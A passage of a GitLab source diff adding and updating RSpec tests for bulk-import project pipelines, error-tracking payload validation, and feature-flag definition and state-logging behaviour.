b/spec/lib/bulk_imports/projects/pipelines/container_expiration_policy_pipeline_spec.rb new file mode 100644 index 00000000000..9dac8e45ef9 --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/container_expiration_policy_pipeline_spec.rb @@ -0,0 +1,40 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::ContainerExpirationPolicyPipeline do + let_it_be(:project) { create(:project) } + let_it_be(:entity) { create(:bulk_import_entity, :project_entity, project: project) } + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + let_it_be(:policy) do + { + 'created_at' => '2019-12-13 13:45:04 UTC', + 'updated_at' => '2019-12-14 13:45:04 UTC', + 'next_run_at' => '2019-12-15 13:45:04 UTC', + 'name_regex' => 'test', + 'name_regex_keep' => 'regex_keep', + 'cadence' => '3month', + 'older_than' => '1month', + 'keep_n' => 100, + 
'enabled' => true + } + end + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + it 'imports project feature', :aggregate_failures do + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [[policy, 0]])) + end + + pipeline.run + + policy.each_pair do |key, value| + expect(entity.project.container_expiration_policy.public_send(key)).to eq(value) + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/pipeline_schedules_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/pipeline_schedules_pipeline_spec.rb new file mode 100644 index 00000000000..12713f008bb --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/pipeline_schedules_pipeline_spec.rb @@ -0,0 +1,64 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::PipelineSchedulesPipeline do + let_it_be(:user) { create(:user) } + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + let_it_be(:bulk_import) { create(:bulk_import, user: user) } + let_it_be(:entity) do + create( + :bulk_import_entity, + :project_entity, + project: project, + bulk_import: bulk_import, + source_full_path: 'source/full/path', + destination_name: 'My Destination Project', + destination_namespace: group.full_path + ) + end + + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + let(:schedule_attributes) { {} } + let(:schedule) do + { + 'description' => 'test pipeline schedule', + 'cron' => '1 1 1 1 1', + 'cron_timezone' => 'UTC', + 'ref' => 'testref', + 'created_at' => '2016-06-13T15:02:47.967Z', + 'updated_at' => '2016-06-14T15:02:47.967Z' + }.merge(schedule_attributes) + end + + subject(:pipeline) { described_class.new(context) } + + before do + 
group.add_owner(user) + + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [schedule])) + end + + pipeline.run + end + + it 'imports schedule into destination project' do + expect(project.pipeline_schedules.count).to eq(1) + pipeline_schedule = project.pipeline_schedules.first + schedule.each do |k, v| + expect(pipeline_schedule.send(k)).to eq(v) + end + end + + context 'is active' do + let(:schedule_attributes) { { 'active' => true } } + + it 'imports the schedule but active is false' do + expect(project.pipeline_schedules.first.active).to be_falsey + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/project_attributes_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/project_attributes_pipeline_spec.rb new file mode 100644 index 00000000000..11c475318bb --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/project_attributes_pipeline_spec.rb @@ -0,0 +1,159 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::ProjectAttributesPipeline do + let_it_be(:project) { create(:project) } + let_it_be(:bulk_import) { create(:bulk_import) } + let_it_be(:entity) { create(:bulk_import_entity, :project_entity, project: project, bulk_import: bulk_import) } + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + let(:tmpdir) { Dir.mktmpdir } + let(:extra) { {} } + let(:project_attributes) do + { + 'description' => 'description', + 'visibility_level' => 0, + 'archived' => false, + 'merge_requests_template' => 'test', + 'merge_requests_rebase_enabled' => true, + 'approvals_before_merge' => 0, + 'reset_approvals_on_push' => true, + 'merge_requests_ff_only_enabled' => true, + 'issues_template' => 'test', + 'shared_runners_enabled' => true, + 'build_coverage_regex' => 
'build_coverage_regex', + 'build_allow_git_fetch' => true, + 'build_timeout' => 3600, + 'pending_delete' => false, + 'public_builds' => true, + 'last_repository_check_failed' => nil, + 'only_allow_merge_if_pipeline_succeeds' => true, + 'has_external_issue_tracker' => false, + 'request_access_enabled' => true, + 'has_external_wiki' => false, + 'ci_config_path' => nil, + 'only_allow_merge_if_all_discussions_are_resolved' => true, + 'printing_merge_request_link_enabled' => true, + 'auto_cancel_pending_pipelines' => 'enabled', + 'service_desk_enabled' => false, + 'delete_error' => nil, + 'disable_overriding_approvers_per_merge_request' => true, + 'resolve_outdated_diff_discussions' => true, + 'jobs_cache_index' => nil, + 'external_authorization_classification_label' => nil, + 'pages_https_only' => false, + 'merge_requests_author_approval' => false, + 'merge_requests_disable_committers_approval' => true, + 'require_password_to_approve' => true, + 'remove_source_branch_after_merge' => true, + 'autoclose_referenced_issues' => true, + 'suggestion_commit_message' => 'Test!' 
+ }.merge(extra) + end + + subject(:pipeline) { described_class.new(context) } + + before do + allow(Dir).to receive(:mktmpdir).and_return(tmpdir) + end + + after do + FileUtils.remove_entry(tmpdir) if Dir.exist?(tmpdir) + end + + describe '#run' do + before do + allow(pipeline).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: project_attributes)) + + pipeline.run + end + + it 'imports project attributes', :aggregate_failures do + project_attributes.each_pair do |key, value| + expect(project.public_send(key)).to eq(value) + end + end + + context 'when project is archived' do + let(:extra) { { 'archived' => true } } + + it 'sets project as archived' do + expect(project.archived).to eq(true) + end + end + end + + describe '#extract' do + before do + file_download_service = instance_double("BulkImports::FileDownloadService") + file_decompression_service = instance_double("BulkImports::FileDecompressionService") + + expect(BulkImports::FileDownloadService) + .to receive(:new) + .with( + configuration: context.configuration, + relative_url: "/#{entity.pluralized_name}/#{entity.source_full_path}/export_relations/download?relation=self", + dir: tmpdir, + filename: 'self.json.gz') + .and_return(file_download_service) + + expect(BulkImports::FileDecompressionService) + .to receive(:new) + .with(dir: tmpdir, filename: 'self.json.gz') + .and_return(file_decompression_service) + + expect(file_download_service).to receive(:execute) + expect(file_decompression_service).to receive(:execute) + end + + it 'downloads, decompresses & decodes json' do + allow(pipeline).to receive(:json_attributes).and_return("{\"test\":\"test\"}") + + extracted_data = pipeline.extract(context) + + expect(extracted_data.data).to match_array([{ 'test' => 'test' }]) + end + + context 'when json parsing error occurs' do + it 'raises an error' do + allow(pipeline).to receive(:json_attributes).and_return("invalid") + + expect { pipeline.extract(context) }.to 
raise_error(BulkImports::Error) + end + end + end + + describe '#transform' do + it 'removes prohibited attributes from hash' do + input = { 'description' => 'description', 'issues' => [], 'milestones' => [], 'id' => 5 } + + expect(Gitlab::ImportExport::AttributeCleaner).to receive(:clean).and_call_original + + expect(pipeline.transform(context, input)).to eq({ 'description' => 'description' }) + end + end + + describe '#load' do + it 'assigns attributes, drops visibility and reconciles shared runner setting' do + expect(project).to receive(:assign_attributes).with(project_attributes) + expect(project).to receive(:reconcile_shared_runners_setting!) + expect(project).to receive(:drop_visibility_level!) + expect(project).to receive(:save!) + + pipeline.load(context, project_attributes) + end + end + + describe '#json_attributes' do + it 'reads raw json from file' do + filepath = File.join(tmpdir, 'self.json') + + FileUtils.touch(filepath) + expect_file_read(filepath) + + pipeline.json_attributes + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/project_feature_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/project_feature_pipeline_spec.rb new file mode 100644 index 00000000000..1f0defdd20c --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/project_feature_pipeline_spec.rb @@ -0,0 +1,45 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::ProjectFeaturePipeline do + let_it_be(:project) { create(:project) } + let_it_be(:entity) { create(:bulk_import_entity, :project_entity, project: project) } + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + let_it_be(:project_feature) do + { + "builds_access_level": 10, + "wiki_access_level": 10, + "issues_access_level": 10, + "merge_requests_access_level": 10, + "snippets_access_level": 10, + "repository_access_level": 10, + 
"pages_access_level": 10, + "forking_access_level": 10, + "metrics_dashboard_access_level": 10, + "operations_access_level": 10, + "analytics_access_level": 10, + "security_and_compliance_access_level": 10, + "container_registry_access_level": 10, + "updated_at": "2016-09-23T11:58:28.000Z", + "created_at": "2014-12-26T09:26:45.000Z" + } + end + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + it 'imports project feature', :aggregate_failures do + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [[project_feature, 0]])) + end + + pipeline.run + + project_feature.each_pair do |key, value| + expect(entity.project.project_feature.public_send(key)).to eq(value) + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/repository_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/repository_pipeline_spec.rb index 583485faf8d..38b22538e70 100644 --- a/spec/lib/bulk_imports/projects/pipelines/repository_pipeline_spec.rb +++ b/spec/lib/bulk_imports/projects/pipelines/repository_pipeline_spec.rb @@ -47,6 +47,17 @@ RSpec.describe BulkImports::Projects::Pipelines::RepositoryPipeline do end end + context 'project has no repository' do + let(:project_data) { { 'httpUrlToRepo' => '' } } + + it 'skips repository import' do + expect(context.portable).not_to receive(:ensure_repository) + expect(context.portable.repository).not_to receive(:fetch_as_mirror) + + pipeline.run + end + end + context 'blocked local networks' do let(:project_data) { { 'httpUrlToRepo' => 'http://localhost/foo.git' } } diff --git a/spec/lib/bulk_imports/projects/pipelines/service_desk_setting_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/service_desk_setting_pipeline_spec.rb new file mode 100644 index 00000000000..2dfa036fc48 --- /dev/null +++ 
b/spec/lib/bulk_imports/projects/pipelines/service_desk_setting_pipeline_spec.rb @@ -0,0 +1,27 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::ServiceDeskSettingPipeline do + let_it_be(:project) { create(:project) } + let_it_be(:entity) { create(:bulk_import_entity, :project_entity, project: project) } + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + let_it_be(:setting) { { 'issue_template_key' => 'test', 'project_key' => 'key' } } + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + it 'imports project feature', :aggregate_failures do + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [[setting, 0]])) + end + + pipeline.run + + setting.each_pair do |key, value| + expect(entity.project.service_desk_setting.public_send(key)).to eq(value) + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/snippets_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/snippets_pipeline_spec.rb new file mode 100644 index 00000000000..dae879de998 --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/snippets_pipeline_spec.rb @@ -0,0 +1,119 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::SnippetsPipeline do + let_it_be(:user) { create(:user) } + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + let_it_be(:bulk_import) { create(:bulk_import, user: user) } + let_it_be(:entity) do + create( + :bulk_import_entity, + :project_entity, + project: project, + bulk_import: bulk_import, + source_full_path: 'source/full/path', + destination_name: 'My Destination Project', + destination_namespace: group.full_path + ) + end + + 
let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + let(:snippet_attributes) { {} } + let(:exported_snippet) do + { + 'id' => 25, + 'title' => 'Snippet with 2 files', + 'content' => 'content', + 'author_id' => 22, + 'project_id' => 6, + 'created_at' => '2021-10-28T20:21:59.712Z', + 'updated_at' => '2021-10-28T20:31:10.408Z', + 'file_name' => 'galactic_empire.rb', + 'visibility_level' => 0, + 'description' => 'How to track your Galactic armies.' + }.merge(snippet_attributes) + end + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + before do + group.add_owner(user) + snippet_with_index = [exported_snippet.dup, 0] + + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [snippet_with_index])) + end + + pipeline.run + end + + it 'imports snippet into destination project' do + imported_snippet = project.snippets.last + + expect(imported_snippet).to have_attributes( + title: exported_snippet['title'], + content: exported_snippet['content'], + author_id: user.id, + created_at: DateTime.parse(exported_snippet['created_at']), + updated_at: DateTime.parse(exported_snippet['updated_at']), + file_name: exported_snippet['file_name'], + visibility_level: exported_snippet['visibility_level']) + end + + context 'with award_emoji' do + let(:snippet_attributes) { { 'award_emoji' => [expected_award] } } + let(:expected_award) do + { + 'id' => 580, + 'name' => 'rocket', + 'user_id' => 1, + 'awardable_type' => 'Snippet', + 'created_at' => '2021-10-28T20:30:25.802Z', + 'updated_at' => '2021-10-28T20:30:25.802Z' + } + end + + it 'restores the award_emoji' do + snippet_award = project.snippets.first.award_emoji.first + + expect(snippet_award).to have_attributes( + name: expected_award['name'], + user_id: user.id, + awardable_type: 
expected_award['awardable_type'], + created_at: DateTime.parse(expected_award['created_at']), + updated_at: DateTime.parse(expected_award['updated_at'])) + end + end + + context 'with notes', :freeze_time do + # To properly emulate a fixture that is expected to be read from a file, we dump a json + # object, then parse it right away. We expected that some attrs like Datetimes be + # converted to Strings. + let(:exported_snippet) { Gitlab::Json.parse(note.noteable.attributes.merge('notes' => notes).to_json) } + let(:note) { create(:note_on_project_snippet, :with_attachment) } + let(:notes) { [note.attributes.merge('author' => { 'name' => note.author.name })] } + + it 'restores the notes' do + snippet_note = project.snippets.last.notes.first + author_name = note.author.name + note_updated_at = exported_snippet['notes'].first['updated_at'].split('.').first + + expect(snippet_note).to have_attributes( + note: note.note + "\n\n *By #{author_name} on #{note_updated_at} (imported from GitLab)*", + noteable_type: note.noteable_type, + author_id: user.id, + updated_at: note.updated_at, + line_code: note.line_code, + commit_id: note.commit_id, + system: note.system, + st_diff: note.st_diff, + updated_by_id: user.id) + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/snippets_repository_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/snippets_repository_pipeline_spec.rb new file mode 100644 index 00000000000..9897e74ec7b --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/snippets_repository_pipeline_spec.rb @@ -0,0 +1,168 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::SnippetsRepositoryPipeline do + let(:user) { create(:user) } + let(:project) { create(:project) } + let(:bulk_import) { create(:bulk_import, user: user) } + let(:bulk_import_configuration) { create(:bulk_import_configuration, bulk_import: bulk_import) } + let!(:matched_snippet) { create(:snippet, 
project: project, created_at: "1981-12-13T23:59:59Z")} + let(:entity) do + create( + :bulk_import_entity, + :project_entity, + project: project, + bulk_import: bulk_import_configuration.bulk_import, + source_full_path: 'source/full/path', + destination_name: 'My Destination Project', + destination_namespace: project.full_path + ) + end + + let(:tracker) { create(:bulk_import_tracker, entity: entity) } + let(:context) { BulkImports::Pipeline::Context.new(tracker) } + + subject(:pipeline) { described_class.new(context) } + + let(:http_url_to_repo) { 'https://example.com/foo/bar/snippets/42.git' } + let(:data) do + [ + { + 'title' => matched_snippet.title, + 'httpUrlToRepo' => http_url_to_repo, + 'createdAt' => matched_snippet.created_at.to_s + } + ] + end + + let(:page_info) do + { + 'next_page' => 'eyJpZCI6IjIyMDA2OTYifQ', + 'has_next_page' => false + } + end + + let(:extracted_data) { BulkImports::Pipeline::ExtractedData.new(data: data, page_info: page_info) } + + describe 'extractor' do + it 'is a GraphqlExtractor with Graphql::GetSnippetRepositoryQuery' do + expect(described_class.get_extractor).to eq( + klass: BulkImports::Common::Extractors::GraphqlExtractor, + options: { + query: BulkImports::Projects::Graphql::GetSnippetRepositoryQuery + }) + end + end + + describe '#run' do + let(:validation_response) { double(Hash, 'error?': false) } + + before do + allow_next_instance_of(BulkImports::Common::Extractors::GraphqlExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(extracted_data) + end + + allow_next_instance_of(Snippets::RepositoryValidationService) do |repository_validation| + allow(repository_validation).to receive(:execute).and_return(validation_response) + end + end + + shared_examples 'skippable snippet' do + it 'does not create snippet repo' do + pipeline.run + + expect(Gitlab::GlRepository::SNIPPET.repository_for(matched_snippet).exists?).to be false + end + end + + context 'when a snippet is not matched' do + let(:data) do + 
[ + { + 'title' => 'unmatched title', + 'httpUrlToRepo' => http_url_to_repo, + 'createdAt' => matched_snippet.created_at.to_s + } + ] + end + + it_behaves_like 'skippable snippet' + end + + context 'when httpUrlToRepo is empty' do + let(:data) do + [ + { + 'title' => matched_snippet.title, + 'createdAt' => matched_snippet.created_at.to_s + } + ] + end + + it_behaves_like 'skippable snippet' + end + + context 'when a snippet matches' do + context 'when snippet url is valid' do + it 'creates snippet repo' do + expect { pipeline.run } + .to change { Gitlab::GlRepository::SNIPPET.repository_for(matched_snippet).exists? }.to true + end + + it 'updates snippets statistics' do + allow_next_instance_of(Repository) do |repository| + allow(repository).to receive(:fetch_as_mirror) + end + + service = double(Snippets::UpdateStatisticsService) + + expect(Snippets::UpdateStatisticsService).to receive(:new).with(kind_of(Snippet)).and_return(service) + expect(service).to receive(:execute) + + pipeline.run + end + + it 'fetches snippet repo from url' do + expect_next_instance_of(Repository) do |repository| + expect(repository) + .to receive(:fetch_as_mirror) + .with("https://oauth2:#{bulk_import_configuration.access_token}@example.com/foo/bar/snippets/42.git") + end + + pipeline.run + end + end + + context 'when url is invalid' do + let(:http_url_to_repo) { 'http://0.0.0.0' } + + it_behaves_like 'skippable snippet' + end + + context 'when snippet is invalid' do + let(:validation_response) { double(Hash, 'error?': true) } + + before do + allow_next_instance_of(Repository) do |repository| + allow(repository).to receive(:fetch_as_mirror) + end + end + + it 'does not leave a hanging SnippetRepository behind' do + pipeline.run + + expect(SnippetRepository.where(snippet_id: matched_snippet.id).exists?).to be false + end + + it 'does not call UpdateStatisticsService' do + expect(Snippets::UpdateStatisticsService).not_to receive(:new) + + pipeline.run + end + + it_behaves_like 'skippable 
snippet' + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/stage_spec.rb b/spec/lib/bulk_imports/projects/stage_spec.rb index e7670085f60..81cbdcae9d1 100644 --- a/spec/lib/bulk_imports/projects/stage_spec.rb +++ b/spec/lib/bulk_imports/projects/stage_spec.rb @@ -2,20 +2,32 @@ require 'spec_helper' +# Any new stages must be added to +# `ee/spec/lib/ee/bulk_imports/projects/stage_spec.rb` as well. RSpec.describe BulkImports::Projects::Stage do let(:pipelines) do [ [0, BulkImports::Projects::Pipelines::ProjectPipeline], [1, BulkImports::Projects::Pipelines::RepositoryPipeline], + [1, BulkImports::Projects::Pipelines::ProjectAttributesPipeline], [2, BulkImports::Common::Pipelines::LabelsPipeline], [2, BulkImports::Common::Pipelines::MilestonesPipeline], + [2, BulkImports::Common::Pipelines::BadgesPipeline], [3, BulkImports::Projects::Pipelines::IssuesPipeline], + [3, BulkImports::Projects::Pipelines::SnippetsPipeline], + [4, BulkImports::Projects::Pipelines::SnippetsRepositoryPipeline], [4, BulkImports::Common::Pipelines::BoardsPipeline], [4, BulkImports::Projects::Pipelines::MergeRequestsPipeline], [4, BulkImports::Projects::Pipelines::ExternalPullRequestsPipeline], [4, BulkImports::Projects::Pipelines::ProtectedBranchesPipeline], + [4, BulkImports::Projects::Pipelines::CiPipelinesPipeline], + [4, BulkImports::Projects::Pipelines::ProjectFeaturePipeline], + [4, BulkImports::Projects::Pipelines::ContainerExpirationPolicyPipeline], + [4, BulkImports::Projects::Pipelines::ServiceDeskSettingPipeline], [5, BulkImports::Common::Pipelines::WikiPipeline], [5, BulkImports::Common::Pipelines::UploadsPipeline], + [5, BulkImports::Projects::Pipelines::AutoDevopsPipeline], + [5, BulkImports::Projects::Pipelines::PipelineSchedulesPipeline], [6, BulkImports::Common::Pipelines::EntityFinisher] ] end diff --git a/spec/lib/error_tracking/collector/payload_validator_spec.rb b/spec/lib/error_tracking/collector/payload_validator_spec.rb index 852cf9eac6c..ab5ec448dff 
100644 --- a/spec/lib/error_tracking/collector/payload_validator_spec.rb +++ b/spec/lib/error_tracking/collector/payload_validator_spec.rb @@ -3,16 +3,18 @@ require 'spec_helper' RSpec.describe ErrorTracking::Collector::PayloadValidator do + let(:validator) { described_class.new } + describe '#valid?' do RSpec.shared_examples 'valid payload' do - it 'returns true' do - expect(described_class.new.valid?(payload)).to be_truthy + specify do + expect(validator).to be_valid(payload) end end RSpec.shared_examples 'invalid payload' do - it 'returns false' do - expect(described_class.new.valid?(payload)).to be_falsey + specify do + expect(validator).not_to be_valid(payload) end end @@ -28,6 +30,12 @@ RSpec.describe ErrorTracking::Collector::PayloadValidator do it_behaves_like 'valid payload' end + context 'python payload in repl' do + let(:payload) { Gitlab::Json.parse(fixture_file('error_tracking/python_event_repl.json')) } + + it_behaves_like 'valid payload' + end + context 'browser payload' do let(:payload) { Gitlab::Json.parse(fixture_file('error_tracking/browser_event.json')) } diff --git a/spec/lib/feature/definition_spec.rb b/spec/lib/feature/definition_spec.rb index 21120012927..2f95f8eeab7 100644 --- a/spec/lib/feature/definition_spec.rb +++ b/spec/lib/feature/definition_spec.rb @@ -161,6 +161,41 @@ RSpec.describe Feature::Definition do end end + describe '.for_upcoming_milestone?' do + using RSpec::Parameterized::TableSyntax + + let(:definition) do + Feature::Definition.new("development/enabled_feature_flag.yml", + name: :enabled_feature_flag, + type: 'development', + milestone: milestone, + default_enabled: false) + end + + before do + allow(Feature::Definition).to receive(:definitions) do + { definition.key => definition } + end + + allow(Gitlab).to receive(:version_info).and_return(Gitlab::VersionInfo.parse(current_milestone)) + end + + subject { definition.for_upcoming_milestone? 
} + + where(:ctx, :milestone, :current_milestone, :expected) do + 'no milestone' | nil | '1.0.0' | false + 'upcoming milestone - major' | '2.3' | '1.9.999' | true + 'upcoming milestone - minor' | '2.3' | '2.2.999' | true + 'current milestone' | '2.3' | '2.3.999' | true + 'past milestone - major' | '1.9' | '2.3.999' | false + 'past milestone - minor' | '2.2' | '2.3.999' | false + end + + with_them do + it {is_expected.to be(expected)} + end + end + describe '.valid_usage!' do before do allow(described_class).to receive(:definitions) do @@ -215,7 +250,42 @@ RSpec.describe Feature::Definition do end end - describe '.defaul_enabled?' do + describe '.log_states?' do + using RSpec::Parameterized::TableSyntax + + let(:definition) do + Feature::Definition.new("development/enabled_feature_flag.yml", + name: :enabled_feature_flag, + type: 'development', + milestone: milestone, + log_state_changes: log_state_change, + default_enabled: false) + end + + before do + allow(Feature::Definition).to receive(:definitions) do + { definition.key => definition } + end + + allow(Gitlab).to receive(:version_info).and_return(Gitlab::VersionInfo.new(10, 0, 0)) + end + + subject { Feature::Definition.log_states?(key) } + + where(:ctx, :key, :milestone, :log_state_change, :expected) do + 'When flag does not exist' | :no_flag | "0.0" | true | false + 'When flag is old, and logging is not forced' | :enabled_feature_flag | "0.0" | false | false + 'When flag is old, but logging is forced' | :enabled_feature_flag | "0.0" | true | true + 'When flag is current' | :enabled_feature_flag | "10.0" | true | true + 'Flag is upcoming' | :enabled_feature_flag | "10.0" | true | true + end + + with_them do + it { is_expected.to be(expected) } + end + end + + describe '.default_enabled?' 
do subject { described_class.default_enabled?(key) } context 'when feature flag exist' do diff --git a/spec/lib/feature_spec.rb b/spec/lib/feature_spec.rb index 58e7292c125..82580d5d700 100644 --- a/spec/lib/feature_spec.rb +++ b/spec/lib/feature_spec.rb @@ -127,6 +127,10 @@ RSpec.describe Feature, stub_feature_flags: false do end describe '.enabled?' do + before do + allow(Feature).to receive(:log_feature_flag_states?).and_return(false) + end + it 'returns false for undefined feature' do expect(described_class.enabled?(:some_random_feature_flag)).to be_falsey end @@ -179,6 +183,35 @@ RSpec.describe Feature, stub_feature_flags: false do expect(described_class.enabled?(:a_feature, default_enabled: fake_default)).to eq(fake_default) end + context 'logging is enabled', :request_store do + before do + allow(Feature).to receive(:log_feature_flag_states?).and_call_original + + definition = Feature::Definition.new("development/enabled_feature_flag.yml", + name: :enabled_feature_flag, + type: 'development', + log_state_changes: true, + default_enabled: false) + + allow(Feature::Definition).to receive(:definitions) do + { definition.key => definition } + end + + described_class.enable(:feature_flag_state_logs) + described_class.enable(:enabled_feature_flag) + described_class.enabled?(:enabled_feature_flag) + end + + it 'does not log feature_flag_state_logs' do + expect(described_class.logged_states).not_to have_key("feature_flag_state_logs") + end + + it 'logs other feature flags' do + expect(described_class.logged_states).to have_key(:enabled_feature_flag) + expect(described_class.logged_states[:enabled_feature_flag]).to be_truthy + end + end + context 'cached feature flag', :request_store do let(:flag) { :some_feature_flag } @@ -491,6 +524,82 @@ RSpec.describe Feature, stub_feature_flags: false do end end + describe '.log_feature_flag_states?' 
do + let(:log_state_changes) { false } + let(:milestone) { "0.0" } + let(:flag_name) { :some_flag } + let(:definition) do + Feature::Definition.new("development/#{flag_name}.yml", + name: flag_name, + type: 'development', + milestone: milestone, + log_state_changes: log_state_changes, + default_enabled: false) + end + + before do + Feature.enable(:feature_flag_state_logs) + Feature.enable(:some_flag) + + allow(Feature).to receive(:log_feature_flag_states?).and_return(false) + allow(Feature).to receive(:log_feature_flag_states?).with(:feature_flag_state_logs).and_call_original + allow(Feature).to receive(:log_feature_flag_states?).with(:some_flag).and_call_original + + allow(Feature::Definition).to receive(:definitions) do + { definition.key => definition } + end + end + + subject { described_class.log_feature_flag_states?(flag_name) } + + context 'when flag is feature_flag_state_logs' do + let(:milestone) { "14.6" } + let(:flag_name) { :feature_flag_state_logs } + let(:log_state_changes) { true } + + it { is_expected.to be_falsey } + end + + context 'when flag is old' do + it { is_expected.to be_falsey } + end + + context 'when flag is old while log_state_changes is not present ' do + let(:definition) do + Feature::Definition.new("development/#{flag_name}.yml", + name: flag_name, + type: 'development', + milestone: milestone, + default_enabled: false) + end + + it { is_expected.to be_falsey } + end + + context 'when flag is old but log_state_changes is true' do + let(:log_state_changes) { true } + + it { is_expected.to be_truthy } + end + + context 'when flag is new and not feature_flag_state_logs' do + let(:milestone) { "14.6" } + + it { is_expected.to be_truthy } + end + + context 'when milestone is nil' do + let(:definition) do + Feature::Definition.new("development/#{flag_name}.yml", + name: flag_name, + type: 'development', + default_enabled: false) + end + + it { is_expected.to be_falsey } + end + end + context 'caching with stale reads from the database', 
:use_clean_rails_redis_caching, :request_store, :aggregate_failures do let(:actor) { stub_feature_flag_gate('CustomActor:5') } let(:another_actor) { stub_feature_flag_gate('CustomActor:10') } diff --git a/spec/lib/generators/gitlab/usage_metric_definition/redis_hll_generator_spec.rb b/spec/lib/generators/gitlab/usage_metric_definition/redis_hll_generator_spec.rb index e497551bc3f..4cba9732c22 100644 --- a/spec/lib/generators/gitlab/usage_metric_definition/redis_hll_generator_spec.rb +++ b/spec/lib/generators/gitlab/usage_metric_definition/redis_hll_generator_spec.rb @@ -28,8 +28,14 @@ RSpec.describe Gitlab::UsageMetricDefinition::RedisHllGenerator, :silence_stdout weekly_metric_definition_path = Dir.glob(File.join(temp_dir, 'metrics/counts_7d/*i_test_event_weekly.yml')).first monthly_metric_definition_path = Dir.glob(File.join(temp_dir, 'metrics/counts_28d/*i_test_event_monthly.yml')).first - expect(YAML.safe_load(File.read(weekly_metric_definition_path))).to include("key_path" => "redis_hll_counters.test_category.i_test_event_weekly") - expect(YAML.safe_load(File.read(monthly_metric_definition_path))).to include("key_path" => "redis_hll_counters.test_category.i_test_event_monthly") + weekly_metric_definition = YAML.safe_load(File.read(weekly_metric_definition_path)) + monthly_metric_definition = YAML.safe_load(File.read(monthly_metric_definition_path)) + + expect(weekly_metric_definition).to include("key_path" => "redis_hll_counters.test_category.i_test_event_weekly") + expect(monthly_metric_definition).to include("key_path" => "redis_hll_counters.test_category.i_test_event_monthly") + + expect(weekly_metric_definition["instrumentation_class"]).to eq('RedisHLLMetric') + expect(monthly_metric_definition["instrumentation_class"]).to eq('RedisHLLMetric') end context 'with ee option' do @@ -49,9 +55,11 @@ RSpec.describe Gitlab::UsageMetricDefinition::RedisHllGenerator, :silence_stdout expect(weekly_metric_definition).to include("key_path" => 
